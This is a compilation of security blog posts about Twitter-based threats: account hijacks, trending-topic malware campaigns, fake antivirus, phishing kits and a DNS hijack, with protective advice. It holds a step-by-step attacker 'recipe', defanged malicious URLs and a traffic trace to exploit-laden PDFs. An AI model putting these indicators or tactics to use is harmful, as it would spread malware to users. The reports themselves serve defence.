Computer Security Articles

Lil Wayne’s Twitter account has been taken offline, after someone hacked into the popular rapper’s account this weekend and posted a series of joke messages.

A hacker, who seemingly guessed the singer’s password, sent a series of bizarre messages to Lil Wayne’s 1.2 million followers – including rude tweets to celebrity pals 50 Cent, Soulja Boy and The Game. According to AllHipHop.com, some of the language used was highly offensive.

Mind you, any fan of music like that is probably used to distasteful language.

Lil Wayne has now shut down his Twitter account, which went by the name @liltunechi. To be honest, he hasn’t had the best of times on Twitter – his page was previously hacked late last year, with fake news being posted about upcoming performances.

Clearly if he can’t keep control of his Twitter account, it’s better that it be disabled.

If nothing else, this case proves that just because a Twitter account is “verified” it doesn’t mean that it really is the celebrity (or an authorised representative) who is doing the tweeting.

Other celebrities who have had their Twitter accounts hacked in the past include Axl Rose, politican Ed Miliband, Britney Spears and plummy-voiced TV property crumpet Kirsty Allsopp.

Make sure that you always choose a non-dictionary word that’s hard to guess as your Twitter password, and never use the same password on multiple websites.

Also, be on your guard against phishing sites and ensure that your computer is running up-to-date anti-virus software to protect against keylogging spyware which may attempt to steal your information.

Finally, consider carefully which third-party applications and websites you allow to connect with your Twitter account.

Full story: Naked Security – Sophos

Backgrounds of the current Twitter Spam mails increase

Full story: a-squared – English

We have become familiar enough with malware creators poisoning popular search engine terms through SEO techniques in order to deliver their malicious files to a greater pool of unsuspecting users. Other popular services such as Twitter have not escaped the watchful eyes of the miscreants. This attack involves pumping out many of the same tweets with different accounts to push them into the Twitter trending list. That way more people are likely to see them even if the individual user accounts being used to send the tweets don't have that many followers. Incidentally many of the accounts used in this attack don't have that many followers and are quite fresh – meaning they are probably fake accounts set up specifically for the purpose of spamming tweets.

To carry out this kind of attack, the miscreants are clearly following a tried-and-tested recipe, borrowed from SEO-based attacks and tweaked for Twitter.

The recipe goes something like this:

1. See what's in fashion
2. Find a suitable host
3. Mask the URLs
4. Start spreading the news
5. Repeat until cooked

1. See what's in fashion
The miscreants are a pretty smart bunch when it comes to Web marketing. They do the research to know what people are interested in. They typically watch for latest newsworthy events or occasions and then zero in on them as the hook for their campaign. Attackers can watch the latest trending topics on Twitter to see what people are currently most interested in.

On December 2nd, one of the hooks used was the Jewish holiday, Hanukkah. As you can imagine, this step is quite fluid and most likely to change daily, making it hard to recognize and defend against. Once they know what hooks to use, they can then set about creating messages that use social engineering techniques to trick users into clicking on them.

Here are some example messages (note the trending Twitter terms planted randomly into the message):

• Nobody cares about Hanukkah
• Get me sex, woman, por fa vor! (((((( Advent Calendar
• Check this link and change your mind 'bout ) Sundance
• Get through this viagra store and read a shocking article about F*****k!!!
• What's in this trend OMG World AIDS
• Damned, I didn't know THAT about Morgan Freeman

2. Find a suitable host
Like any good parasite, the miscreants need to find a suitable host for their attack. Attackers these days typically choose a number of ways to host malware. They can use their own hosting, with a bullet hosting service. Alternatively they could use a bot under their control, rent a bot, or hack into a third party website. The latter choice is a low cost and quite effective option, especially when you consider the shelf life of these attacks—there little point in investing money in something that will be terminated in a few days.

Once a suitable host server is found, the choice is whether to attach the malcode to existing pages using a redirect or iframe or to create brand new pages specifically to host the malcode. The first option has the bonus of catching unsuspecting visitors to the site, as well as any traffic driven to the site by the attackers themselves. The second option limits the victims to those that the attackers direct to the page, but the advantage here is that the page can stay below the radar (i.e. if the page is not linked into any part of the real web site, nobody is likely to find it unless they went looking for it).

3. Mask the URL
Masking URLs is clearly of great benefit to malware creators. Some URL-shortening services are used by mainstream publications and services like Twitter in order to conserve space. The downside is that the final destination of the link is hidden. Because of this obfuscation, it is more difficult for users to recognize risky domains let alone block them. Some URL shortening services are better than others in so far as they offer previewing capabilities. In the case of tiny.cc, it even offers a stats page where anybody can see how many hits were made as well as the destination of the shortened URL. Some services, such as bit.ly, have also integrated link blacklisting services, automatically filtering out attempts to create shortened links to known malware sites.

Based on the click stats of the shortened URLs (tiny.cc) used in this attack, we can see that a very large number of users may have potentially been compromised in this attack:

• tiny.cc/swkw4 — 42340 clicks
• tiny.cc/3cxal — 42527 clicks
• tiny.cc/v123p — 42564 clicks
• tiny.cc/isuny — 43678 clicks

As far as we can tell, the shortened URLs were only created on December 1st.

At this time, we have noted that the masked URLs end up at either mybuger.info or ljivore.info (through several levels of redirection). Mybuger.info uses a social engineering trick, asking the user to download a file to view a video (activex.exe – detected as Trojan.Bamital). Note that the URL in the browser says bestvideo.has.it but the content is actually from mybuger.info.

The ljivore.info site hosts several exploits including:

• Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability
• Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities
• Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability
• Adobe Reader and Acrobat 'newplayer()' JavaScript Method Remote Code Execution Vulnerability
• Adobe Reader 'CoolType.dll' TTF Font Remote Code Execution Vulnerability
• Oracle Java SE and Java for Business Unspecified Vulnerabilities
• Oracle Java SE and Java for Business JRE Trusted Method Chaining Remote Code Execution Vulnerability
• Apple QuickTime '_Marshaled_pUnk' Remote Code Execution Vulnerability

Successful exploitation will result in the download and installation of the same executable file as found on mybuger.info.

4. Start spreading the news
Once the initial ground work is done, the attackers need to get their malicious content to as wide a pool of people as possible. It is likely that the attackers have at their disposal a large collection of accounts from which they can automate the sending of messages. Automation of tweets can be quite easily done by creating bots to periodically and randomly send tweets from a predefined selection of messages created in step one and adding a shortened URL from step three. As the number of accounts used is likely to be quite large and tweets frequent, the likely overall effect is to push these tweets into the live Twitter feeds when users go to check the trending topics. In addition the tweets are also making use of features such as hash tags to help it reach an even wider audience.

While many of the accounts used appear to be created for the purpose of the attack, there may be some accounts used that are legitimate accounts that have been hacked. The advantage of tweeting through hacked accounts is that the account may already have a built-in network of followers. By tweeting through such an account you tweet to all its followers. This is indeed a powerful way to spread the news.

5. Repeat until cooked
The last step of the process is to repeat the previous step as necessary until the goal is achieved. It is likely that the goal here is to make money (e.g. affiliate schemes). The final payload downloaded is Trojan.Bamital, which is used for manipulating search results to include links to adverts and so forth.  Because this is a profit-driven exercise, the attacker is likely to have an operational process that continually monitors and adjusts each step of the process to keep it working in a optimal manner, maintaining the flow of money. Despite the section title, this metaphorical goose is never going to be cooked so the process will continue indefinitely until either the money making avenues are closed or these guys are put out of business, neither of which are likely to happen anytime soon.

Staying safe
In the mean time our best advice is to be wary of bizarre-looking messages on Twitter, particularly those found in the trending feeds and avoid following the links. To their credit, Twitter has put in place processes to stem the flow of malicious tweets coming from trend abusers.

Use a URL filtering/rating service such as Norton Safe Web can help to keep you away from malicious sites. As this attack makes extensive use of software vulnerabilities, it is important to keep any installed software up-to-date, applying relevant security patches that are made available. Finally, keeping your antivirus and firewall software active and up-to-date is always a good idea.

The various files used in this attack are detected by Symantec with the following signatures:

• Trojan.Pidief
• Trojan.Webkit!html
• Trojan Horse
• Trojan.Bamital
• Bloodhound.Exploit.357
• Bloodhound.Exploit.354

IPS-enabled products are also capable of blocking the redirections and does so with this signature:
HTTP Malicious Toolkit IFrame Injection

For more information on social networking based attacks and how to avoid them, please see Candid Wueest's excellent paper.

Thanks to Piotr Krysiuk for his technical contributions.

– Hon Lau on Symantec Connect – Security Response – Blog Entries

Cyber criminals are using social media more frequently to distribute their malicious creations. Pft! As if Blackhat SEO, fake advertisements, and hacked websites weren’t enough?!

Today we’ll take a look at a Rogueware campaign using Twitter for distribution.  Several fake profiles (and compromised ones too) started tweeting “a very good antivirus” followed by a shortened link.

A very "good" antivirus

Clicking the link in Firefox leads us to a fake Firefox warning screen, which attempts to social engineer users into believing that Firefox is prompting for a security update.

Fake Firefox Security Alert

Once “Start Protection” is clicked, the user is prompted to install Setup.exe, which we detect as Adware/ThinkPoint.  After the malware is installed, the computer prompts to restart.

Once the computer is restarted, the following screen appears:

ThinkPoint Rogueware

The software then automatically performs a “scan” and reports a number of fake issues:

ThinkPoint Scan

Of course, their solution is to purchase the software! Don’t!

This was a relatively small campaign, but it’s common for cyber criminals to test the waters before taking a dive into the deep end.  We expect to see these social media malware campaigns throughout 2011.

– Sean-Paul Correll on PandaLabs Blog

It’s quite common to see attackers use hot topics on social networks to force users to click on malicious links. So what would be more interesting these days than using the term “Wikileaks”? – on Securelist / All Updates

Last year we documented the very first trending topic attack on Twitter.  The attack is similar to a Blackhat SEO campaign, where criminals leverage the many hot topics discussed on the Internet in order to position their malware campaigns in highly visible places on Twitter.   Earlier today we noticed over 300 Twitter accounts targeting various trending topics on Twitter. Thousands of Tweets ranging from “Nobody cares about Hanukkah” to “Shocking video of the Grinch” were accompanied by shortened malicious  URL’s.    Clicking on the link would lead to a fake codec site, which would then attempt to exploit your system with a PDF vulnerability (CVE-2010-2883) on top of prompting you to download a malicious “codec,” which in reality is a generic Trojan downloader.

Tweets sent out for just one malicious URL (click for larger view)

Malicious Tweet:

Twitter Trending Topic Attack – Nobody cares about Hanukkuh

Infection site:

Twitter Trending Topic Attack – Malicious Site

Other targeted topics include:

• Grinch
• Hanukkah
• Advent calendar
• Carling cup
• AIDS Awareness
• Morgan Freeman
• Sundance
• Gruden

These attacks are not as frequent as the Blackhat SEO attacks we observe on a daily basis, but they do pop up from time to time.  We have always suggested to avoid any links in the trending topic area of Twitter for this very reason.

Keep your computer safe this Christmas

With the increased risk over the holiday period, PandaLabs offers users a series of practical security tips for using social media:

1) Don’t click suspicious links from non-trusted sources. This should apply to messages received through Twitter, through other social networks and even via email.

2) If you click on the links, check the target page. If you don’t recognize it, close your browser.

3) Even if you don’t see anything strange in the target page, but you are asked to download something, don’t accept.

4) Install all available operating system updates and patches. Cyber-criminals are particularly skilled at exploiting critical vulnerabilities in operating systems and commonly used applications. Computer users are often silently redirected to a website with a carefully crafted malicious payload that leaves the computer infected with data-stealing malware or extortion-based threats. In addition to updating your system, PandaLabs strongly advises people to update Adobe Flash, Adobe Reader and Java software, which are all commonly targeted by cyber criminals.

5) If you do download or install an executable file and the PC starts to launch messages or behaves strangely, there is probably malware on your computer. In this case, you should check your computer with a free online scanner such as ActiveScan, available at: www.activescan.com.

6) As a general rule, make sure your computer is well protected to ensure that you are not exposed to the risk of infection from any malicious code. You can protect yourself with the new, free Panda Cloud Antivirus solution (www.cloudantivirus.com).

– Sean-Paul Correll on PandaLabs Blog

There was an attack targeting various trending trending topics on Twitter today. I’ve been analyzing the campaign and have collected the following information:

(Malware and Maltego file available upon request.  Shoot me a message on Twitter.)

• 311 accounts were involved in the attack
• Many of these Twitter handles were harvested between May and July of last year (!), which leads me to believe that it originated from the same group of people from last year’s attack that took place around June. (http://pandalabs.pandasecurity.com/visualizing-the-twitter-trends-attack/)
• The bulk of the attack took place 8 hours ago.
• 11 shortened URLs
• Site contains asx file pointing to exploits
• Site attempts to exploit PDF vulnerabilities (object 17.0 contains SING table overflow CVE-2010-2883)
• Generic downloader Trojan

  Maltego view of the malicious tweets for one of the malicious URL’s

Twitter Trending Topic Attack

Here are the shortened URL’s used in the attack:

Warning: These URL’s point to malicious sites that contain live exploits.

hxxp://shortlinks.co.uk/2o10

hxxp://urlcut.com/1yoec

hxxp://doiop.com/li7h90

hxxp://tiny.cc/swkw4

hxxp://tiny.cc/isuny

hxxp://tinyurl.com/32eothq

hxxp://tiny.cc/v123p

hxxp://alturl.com/fb6cb

hxxp://doiop.com/c0ae2b

hxxp://bit.ly/hLJhq4

hxxp://yep.it/powmfk

Here is the traffic right after we click on a link in Twitter:

GET hxxp://shortlinks.co.uk/2o10

302 Found to hxxp://briceguilbert.com/about.html

GET hxxp://briceguilbert.com/about.html

304 Not Modified ()

GET hxxp://twitter.com/scribe?r=3915&log%5B%5D=%7B%22component%22%3A%22dashboard%22%2C%22trends%22%3A%5B%7B%22trend%22%3A%22%23Share%22%2C%22rank%22%3A0%2C%22promoted_content_id%22%3A83%7D%2C%7B%22trend%22%3A%22%232010disappointments%22%2C%22rank%22%3A1%7D%2C%7B%22trend%22%3A%22%23lilkimmustfeellike%22%2C%22rank%22%3A2%7D%2C%7B%22trend%22%3A%22%23frasesquemarcaron%22%2C%22rank%22%3A3%7D%2C%7B%22trend%22%3A%22Nominations%22%2C%22rank%22%3A4%7D%2C%7B%22trend%22%3A%22Hanukkah%22%2C%22rank%22%3A5%7D%2C%7B%22trend%22%3A%22Grinch%22%2C%22rank%22%3A6%7D%2C%7B%22trend%22%3A%22Kyrie%20Irving%22%2C%22rank%22%3A7%7D%2C%7B%22trend%22%3A%22World%20AIDS%22%2C%22rank%22%3A8%7D%2C%7B%22trend%22%3A%22Chabelo%22%2C%22rank%22%3A9%7D%5D%2C%22page%22%3A%22search%22%2C%22_category_%22%3A%22webclient%22%2C%22event_name%22%3A%22trend-impression%22%2C%22ts%22%3A1291267543912%7D&log%5B%5D=%7B%22component%22%3A%22dashboard%22%2C%22trends%22%3A%5B%7B%22trend%22%3A%22%23Share%22%2C%22rank%22%3A0%2C%22promoted_content_id%22%3A83%7D%2C%7B%22trend%22%3A%22%232010disappointments%22%2C%22rank%22%3A1%7D%2C%7B%22trend%22%3A%22%23lilkimmustfeellike%22%2C%22rank%22%3A2%7D%2C%7B%22trend%22%3A%22%23frasesquemarcaron%22%2C%22rank%22%3A3%7D%2C%7B%22trend%22%3A%22Nominations%22%2C%22rank%22%3A4%7D%2C%7B%22trend%22%3A%22Hanukkah%22%2C%22rank%22%3A5%7D%2C%7B%22trend%22%3A%22Grinch%22%2C%22rank%22%3A6%7D%2C%7B%22trend%22%3A%22Kyrie%20Irving%22%2C%22rank%22%3A7%7D%2C%7B%22trend%22%3A%22World%20AIDS%22%2C%22rank%22%3A8%7D%2C%7B%22trend%22%3A%22Chabelo%22%2C%22rank%22%3A9%7D%5D%2C%22page%22%3A%22search%22%2C%22_category_%22%3A%22webclient%22%2C%22event_name%22%3A%22trend-impression%22%2C%22ts%22%3A1291267572467%7D

200 OK (text/javascript)

GET hxxp://bestivideos.has.it/

200 OK (text/html)

GET hxxp://bestivideos.has.it/ad.html

304 Not Modified ()

GET hxxp://mybuger.info/flash/

304 Not Modified ()

GET hxxp://nht-2.extreme-dm.com/n2.g?login=todd&pid=kickad&jv=y&j=y&srw=1024&srb=16&l=hxxp%3A//bestivideos.has.it/

200 OK (image/gif)

GET hxxp://ljivore.info/folder/index.php?f85f8c52a26c60a4b4aed5232760bc83

200 OK (text/html)

GET hxxp://mybuger.info/flash/error.jpg

404 Not Found (text/html)

GET hxxp://ljivore.info/folder/images/43abbf45f97a3d649961cf9f6854c6a6.asx

200 OK (video/x-ms-asx)

GET hxxp://ljivore.info/folder/images/np/43abbf45f97a3d649961cf9f6854c6a6/f3a350ffbd6b32a3b3f0d29ebf395ab8.pdf

200 OK (application/pdf)

– lithium on Malware Database

New attack via Twitter is in progress – on Securelist / All Updates

Twitter has made it extremely easy for people to share news and web links and at the same time has created a boon for online criminals. It is hard to find a web service that has done more to make malware distributors’ jobs easier.

I don’t mean just the explosive growth in the Twitter user base. Microblogging in general, and Twitter specifically, contribute to malware distribution in fundamental ways that must be re-examined and corrected.

Here are the Twitter features that make it so dangerous:

1. Twitter usernames are easily harvested in vast quantities
2. Criminals can send tweets to anyone on Twitter
3. Twitter encourages its users to share without thinking
4. Twitter and supporting services like bit.ly strip away critical context
5. Twitter is programmable and can be automated using their published APIs

While each of these features has appeared to some degree in other Internet services like email and instant messaging, Twitter has taken them to a new level and — as icing on the cake — got celebrities like Ashton Kusher and Miley Cyrus to help fuel the frenzy of massive sharing.

Before describing how these features introduce vulnerabilities hackers can exploit more easily than ever, let’s be clear that this is not Twitter bashing. There is a reason Twitter has become so popular: it clearly meets a need shared by many millions of users. On Twitter.com we see people using the best features of the Internet to be more connected and more informed. But just as we think twice about attending large gatherings during a swine flu pandemic, we should also think twice about sharing links on an infected Internet.

Okay, let’s look at our hacker wish list in more detail.

Twitter usernames are easily harvested in vast quantities

Compared to email, collecting huge lists of Twitter usernames is incredibly easy. Part of the attraction of Twitter is that anyone can see what all the users are up to, including seeing usernames. Showing everyone what everyone else is saying is a great way to encourage new users to join the fun. It’s also a great way to build a list of users to target.

Quality email lists, on the contrary, are harder to build. Malware authors have been very creative in building tools to collect email address lists. The Warezov worm, for example, would scan a PC for email addresses and then send itself to those addresses to continue the process. These worms, however, require a user to open a binary attachment to start the process, and then require the next recipients to do the same.

Warezov and other email worms were pretty darn effective, but gathering lists of Twitter users does not require jumping through such technical and social engineering hoops. The public nature of Twitter usernames, combined with the Twitter API (see below), make it outrageously easy “crawl” across Twitter and build massive lists of users.

Here is an interesting look at a Twitter-crawling app created by some good guys — repeat Good Guys! — that demonstrates the concept.

Looking at the image above, it is important to note that not only are lists of usernames easy to build, but relationships between users are also publicly available on Twitter, raising the possibility of targeted attacks against organizations using (seemingly) inside information. (“Harry Reid said you should respond to this: [click here]“)

Criminals can send tweets to anyone on Twitter

Now that we have a huge list of usernames that we generated in a couple of hours, our next step will be to send them malicious links to infect their computers. Before the rist of Twitter, there were other methods malware distributors used to get links in front of people. “Spim” is the term of sending spammy links through an Instant Messaging (IM) network. But the Instant Messaging model calls for users to establish relationships by a two-way handshake. I add a new user to my contact list, they see the request and choose to accept the relationship. Then I can send messages. Now, it is true that malware writers can circumvent this requirement for a handshake but, like the email address harvesting example above, it requires malware engineering to get around protection designed into IM systems. On Twitter there is no such requirement.

Twitter has a similar model wherein I follow you and you follow me. But you do not have to choose to follow me in order to see messages from me. I can follow you, see your tweets, and send a reply that you will see in your reply box. The Replies page is labeled “Tweets mentioning [myusername]“. And on Twitter, who does NOT want to see tweets mentioning them? (Miley Cyrus aside.) Compared to the effort of hacking an IM system to send unsolicited links, Twitter makes it very easy for anyone to send links to arbitrary users.

So I build a huge list of usernames, follow all the users, wait for them to tweet and then reply with: “You are so right and this proves it: [click here]“
At this point, the only thing keeping my huge list of users from clicking the link is a good dose of caution. And Twitter is not about caution. Read on.

Twitter encourages its users to share without thinking

Stepping out of the technical realm for a moment, let’s look at the Twitter social phenomenon. Twitter is not about privacy. Twitter is about massive-scale sharing. The tagline on the Twitter home page is, “Share and discover what’s happening right now, anywhere in the world.” And, “Join the conversation.” THE conversation. Not one on one conversations with your known friends. We’re talking about The Big conversation that we crawled through collecting our usernames up in step one.

Twitter does provide Public or Protected accounts. But the default setting is public and the message is clear: don’t be shy. Jump in the deep end of the pool.

On top of that, the first step you see after creating an account is “See if your friends are on Twitter” and a web form that asks for your Gmail, Yahoo or AOL email password. Yes, your password. Twitter will log into your email account and retrieve your contact list to see if there are matching Twitter accounts. Doesn’t this sound just like our friend Warezov described above?

Of course these are features designed to maximize the number of users and connections between users, and that’s the attraction of Twitter. The sunny day scenario is positive one that helps build the Big Conversation. What we are doing here is looking at these features with an eye on how they contribute to the spread of malware across the Internet.

So to recap: we have a huge list of usernames with known relationships between users, we can send any of them a link that includes some apparently familiar context even though they don’t know us, and the users are in a hurry. Tweets are short and sweet and meant to be posted and read frequently. This favors the social engineering malware distributor who hopes the users do not spend too much time deciding whether or not to click a link in a tweet.

Twitter and supporting services like bit.ly strip away critical context

Tweets are very short messages that don’t leave a lot of room to establish familiar context. “Check this out: [click here]” is a classic line from emails that distribute malware.

The shortened URLs that appear in tweets remove all the warning signs that indicate dangerous links. When a link appears in your email, an IM message or a tweet it is important to inspect the URL and see where it goes before clicking on it. If we receive a message that looks like it is from a friend asking us to look at their vacation pictures, we have a chance to be suspicious if the URL ends in a .ru (Russia) or .cn (China). It’s not likely that our friends chose a Russian or Chinese photo hosting service. Or if the link is purportedly from our bank but the URL looks like http://aimee.pl345xxx.ru/scripts/infector/clickit.html, we might be wary about clicking it.

URL shortening services like bit.ly, tinyurl.com or tweetburner remove all the useful context and turn all URLs into generic nonsense. There is no chance for a user to screen out risky URLs when they are shortened.

Then there is the risk of someone penetrating the URL shortening service itself and hijacking previously shortened links to point them to malware sites. Over 2 million shortened links were hijacked this summer at URL shortening service Cligs.

Twitter is programmable and can be automated using their published APIs

As I mentioned above, Twitter provides an Application Programming Interface (API) that lets developers create programs to automatically exercise Twitter features. Features that the API does not support can be accessed by automating web requests as described here: Scripting Twitter with cURL.

Countermeasures

As we have seen, Twitter is a feature-rich malware distribution platform with a ready-to-go user base of 25 million Tweeters who are predisposed to do exactly what the bad guys want: click it fast. Here is a short list of things users can do protect themselves:

• Protect your tweets: Go into your Twitter settings and click the “Protect my tweets” checkbox at the bottom. This will remove you from the public timeline and only people you approve can follow your tweets and send you replies.
• Check those short links: Network security firm Sucuri provides a free service that scans shortened URLs with McAfee SiteAdvisor and Google’s SafeBrowsing service. It’s available here: http://sucuri.net/index.php?page=tools&title=check-url. AVG’s LinkScanner is also an option that will scan all the links you visit in a supported browser.
• Use Twitter security tools: Security tools designed specifically for Twitter are starting to appear on the market. I haven’t evaluated them yet, but one recent example is Krab Krawler from Kaspersky.

– on SafeCentral Blog

Notifications of ClamAV signature updates are now available via our
Twitter feed at http://twitter.com/clamav. The notifications include information about the number of signatures added and the total number of signatures in the ClamAV database.
We hope to include other information on that feed later so please feel free to let us know
suggestions, but remember that “twittiquette” means that we don’t wish to flood the feed with
too much information.

– webmaster on Clam AntiVirus

(See continuing updates to this story below.)

Earlier this morning a DNS hack took control of Twitter.com traffic and redirected to a website with a splash page proclaiming, “THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY.” This hack has a lot in common with the Dr.Hiad website defacement I reported on two weeks ago.

New information
The so-called Iranian Cyber Army has defaced websites in the same manner as Dr.Hiad. At this moment (7:35AM Eastern Time) there is a website displaying the exact image that Twitter users saw earlier today during the Twitter hack event. A screenshot of that web page is shown below. The webpage contains an email link to the Iranian Cyber Army’s Gmail account.

It is likely that the Twitter DNS attackers simply pointed “twitter.com” to the IP address of a defaced website like the one below. It would not make sense for them to point Twitter traffic to their own web server: that would allow them to be traced and possibly caught.

When the Twitter attackers realized they could take over Twitter’s DNS, they had to decide where to point the traffic. Redirect it to comedycentral.com? Disney.com? Or how about a defaced webpage bearing the image of the Iranian Cyber Army?

There is some chance the Twitter attackers executed both the website defacement and the DNS takeover.

DNS is Fundamental
DNS is the Internet service that kicks in when we type a website name into our browser or click a link on a web page. Type “twitter.com” into your browser and DNS will lookup the IP address of the Twitter web server so your browser can connect and download all those tweets. As fundamental as DNS is to our Internet experience, it has virtually no security, particularly on our home computers and Internet connections. Also, the DNS servers “up in the cloud” are rife with vulnerabilities that enable attackers to gain control and carry out pranks like the Twitter redirection this morning.

Updates

December 18, 2009 8:20AM – Update
The defaced website that Twitter users were directed to, shown in the screenshot above, is an online forum for the Green Freedom Wave, an Iranian reform movement.

December 18, 2009 9:08AM – Update
The Green Freedom Wave website was hosted at Netfirms, a managed web server company that is well-known to website defacers who exploit weaknesses in web and database servers. These web hosting companies offer lots of functionality, including web sites, databases and online shops, at very reasonable prices. However, these features also can make them vulnerable to compromise.

The website defacement is the minor part of this story. The DNS takeover is extremely serious, especially since it happened at Twitter.com, which receives over 20 million visitors per month. If the Twitter.com site had been redirected to a web page containing malware, a huge chunk of the Internet population would be infected. Perhaps I should say a “huger” chunk: 35 million computers infected per month with one type of malware.

December 18, 2009 10:35AM – Update
The Green Freedom Wave website was probably hacked using SQL Injection, Remote File Inclusion, or similar techniques that are well-documented on the web. Note the signature line of Dr.Hiad from my earlier post. Remote File Inclusion allows an attacker to exploit a script on the target website to replace the home page of the website.

December 19, 2009 7:49AM – Update
Busy day yesterday speaking to reporters and colleagues about the Twitter DNS compromise. Here are a couple of stories:

– on SafeCentral Blog

There were some very pecular goings on in Twitter land today, as the account of Kirsty Allsopp seemed to be taking potshots at Sir Alan Sugar:

Click to Enlarge

The only problem? She didn’t post that message, despite a bit of confusion and the fact that the pair of them had a very public argument recently.

It seems like it might be an easy thing to work out: so far, the compromiser is apparently making all of their posts from an iPhone.

Not so long ago, her account was hijacked and started sending out iPad spam. Methinks this time around she’ll be lucky not to get a “You’re fired” from Sir Alan…

Christopher Boyd

View full post on Sunbelt Blog

Spammers are taking you on a jolly ride starting with a Twitter phishing scam: Which if you follow it, gets you on to a 123Greetings look alike site: When I see various drugs advertised on that same page, I think: “Canadian pharmacy!”. Trying to play the e-card or clicking on anything on that page for [...]

View full post on Malware Diaries

Ignorance is bliss, so don’t read any further if you don’t want to panic about Facebook and Twitter security.

View full post on Computerworld Security News

Jury selection for Oracle’s corporate theft lawsuit against SAP got under way Monday in a California courtroom, where potential jurors were warned they would have to refrain from posting on Facebook or Twitter about the case if they are selected to take part in the trial.

View full post on Computerworld Security News

A slip on the keyboard could land Web surfers on questionable survey pages instead of the websites they really want to visit: Twitter, Facebook or YouTube.

View full post on Network World on Security

A new variant of the Koobface worm that targets Mac OS X and Linux as well as Windows is spreading through Facebook, MySpace and Twitter, security researchers warned today.

View full post on Network World on Security

A new Firefox add-on dubbed Firesheep lets ‘pretty much anyone’ scan a Wi-Fi network and hijack others’ access to Facebook, Twitter and a host of other services, a security researcher warned today.

View full post on Computerworld Security News

A new Firefox addin named Firesheep lets users take over sessions on Facebook, Twitter, Google, and more from open Wi-Fi networks.

View full post on PCMag.com Security Coverage

Over the weekend we saw a link being pinged around in various chatrooms, which was directing users to a “mobile” version of Twitter. The page was a phish located on a free webhost:

Click to Enlarge

What particularly caught my eye was when I dug around on Twitter itself for the URL. Check out these posts from 2009:

We have a Twitter account with “Facebook” in the name (a dirty big clue that something isn’t right here), sending out links to a “lighter version of Facebook”…which takes you to the fake Twitter page.

I’m sure it made sense to the creator at the time, but anyway. This was a clear attempt to grab some high profile accounts and use them for shenanigans:

Warren Sapp, retired American Football player.

Alison Sudol, singer / songwriter with a rather large follow count.

Pete Wentz from the band Fall Out Boy, with an even bigger collection of followers.

It doesn’t look like any of them ever sent out spam, infection or phish links so hopefully they didn’t take the bait – there could have been a bit of a Fall Out (oh ho ho) from that eventuality. The phish URL had quite a bit of action going on:

Fake Facebook and Twitter pages, along with a stolen password page for each. Luckily neither password dump appeared to have any valid accounts in them – everything we saw was either random garbage or humorous and entertaining messages left for the phisher, usually with a record number of swearwords thrown in for good measure.

Of course, we’ve reported all of the above and while the rogue Twitter account is still live (though probably not for long), the URL it happens to be pointing to looks like this:

Click to Enlarge

“The site in question was violating our ToS and was removed”.

No kidding.

Christopher Boyd

View full post on Sunbelt Blog

You might be wondering why the frontpage of Twitter has a big “Edit” line running through it in the screenshot below:

Click to Enlarge

The answer, of course, is that this is not the real Twitter page at all. It’s part of an increasingly popular kit used for shenanigans:

The scammer downloads the zip, edits the links in the .htm file and places something likely to catch the attention of an end-user underneath the “Edit” line. The fact that the fake content is sitting directly underneath the “New Twitter” promotional text is not a coincidence.

Click to Enlarge

“Hey look, semi-naked ladies are part of the new Twitter experience! Yay! Oh wait, I have to run some sort of Sun Java update…and now my computer is sending Viagra spam to my mother.”

Top tip: if you happen to see semi-naked ladies posing under the yellow “Sign up” button on the Twitter homepage, you’re on a scam site. If the Twitter homepage starts popping boxes asking you to install Java security updates, or grab Adobe Flash executables, or files with “pwned” in the title – you’re on a scam site.

The “new Twitter experience” may be full of shiny, blinky things but infection files aren’t supposed to be part of the deal. On the bright side, all the fake pages we’ve seen so far make no attempt to disguise the fact they’re sitting on free hosting services. This obviously means that don’t look a bit like the genuine Twitter.com URL. I’m sure it won’t stay like that forever though, so be wary of potential typosquatting because this technique combined with an “almost but not quite” domain name could reel in quite a few victims…

Christopher Boyd

View full post on Sunbelt Blog

Twitter has pulled the plug on its involvement in a Web site intended to track the whereabouts of celebrities. JustSpotted.com misrepresented itself, so its license to access the micro-blogging site’s “firehose” of data was revoked, Twitter said Friday.

View full post on PCMag.com Security Coverage

Our man in the UK Chris Boyd got this via a contact. It was from a Twitterer who obviously had his Twitter login stolen:

 
(click on graphic to enlarge)

(Twitter apparently is filtering this URL at this point.)

The link led to a phishing page that used the deceptive tactic of showing an error message: “Wrong Username/Email and password combination.” You login, it steals your Twitter password, sends the above Tweet to all your contacts and continuing rounding up passwords.

 
(click on graphic to enlarge)

If you’re “ill-informed” enough to log in to the phishing page, it snatches what ever username and password you’ve entered and passes you along to the Twitter log-in page. We made up a username and password and it took them. The real Twitter log-in page would have given you an error notification.

 There are two pieces of evidence here that you’ve been phished: Firefox asks if you want it to remember the password which you just gave to my3gb.com – obviously the phishing site (up since July 12). And there’s the Twitter “sign in” button on the page. That wouldn’t be there if you had really logged in.

 
(click on graphic to enlarge)

This is phishing. The safe practice in this situation is: don’t log into pages that you get as links in emails. Go to the site yourself: type in the URL or use your bookmark.

Thanks “Just_this_time”

Tom Kelchner

View full post on Sunbelt Blog

In the wake of the new Twitter.com roll-out, the micro-blogging site on Monday was experiencing intermittent issues that affected follower counts as well as the ability to follow other users and send direct messages.

View full post on PCMag.com Security Coverage